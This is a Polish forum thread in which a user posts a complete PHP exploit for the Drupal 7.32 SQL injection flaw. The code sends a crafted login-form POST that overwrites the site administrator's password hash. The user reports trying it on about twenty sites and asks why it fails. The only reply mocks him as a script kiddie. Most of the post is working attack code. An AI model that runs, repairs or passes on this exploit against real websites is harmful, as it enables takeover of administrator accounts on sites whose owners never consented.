Problem z exploitem

[kamilkosiak]

Witam. Bawiłem się exploitem dla silnika drupal 7.32 lub mniejsze. Poniżej jego kod:

<?php
$url = 'http://www.example.com';
$post_data = "name[0%20;update+users+set+name%3D'admin'+,+pass+%3d+'" . urlencode('$S$CTo9G7Lx2rJENglhirA8oi7v9LtLYWFrGm.F.0Jurx3aJAmSJ53g') . "'+where+uid+%3D+'1';;#%20%20]=test3&name[0]=test&pass=test&test2=test&form_build_id=&form_id=user_login_block&op=Log+in";
 
$params = array(
'http' => array(
'method' => 'POST',
'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
'content' => $post_data
)
);
$ctx = stream_context_create($params);
$data = file_get_contents($url . '?q=node&destination=node', null, $ctx);
 
if(stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) {
echo "Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login";
} else {
echo "Error! Either the website isn't vulnerable, or your Internet isn't working. ";
}
?>

Problem polega na tym, że exploit nie działa wywalając zawsze:

"Error! Either the website isn't vulnerable, or your Internet isn't working. "

W 2/20 przypadków udało mi się otrzymać pozytywną informację:

"Success! Log in with username \"admin\" and password \"admin\" at {$url}user/login"

Mimo wszystko na stronach z pozytywną informacja nie udało mi się zalogować danymi, które wyświetlało za rzekomo pozytywne(login: admin, pass: admin),

Czy ktoś wie w czym może być problem?

Pozdrawiam

 

[Casper]

Tak, wiemy.

Problem jest w tym, że bierzesz się za rzeczy o których nie masz zielonego pojęcia drogi script kiddie.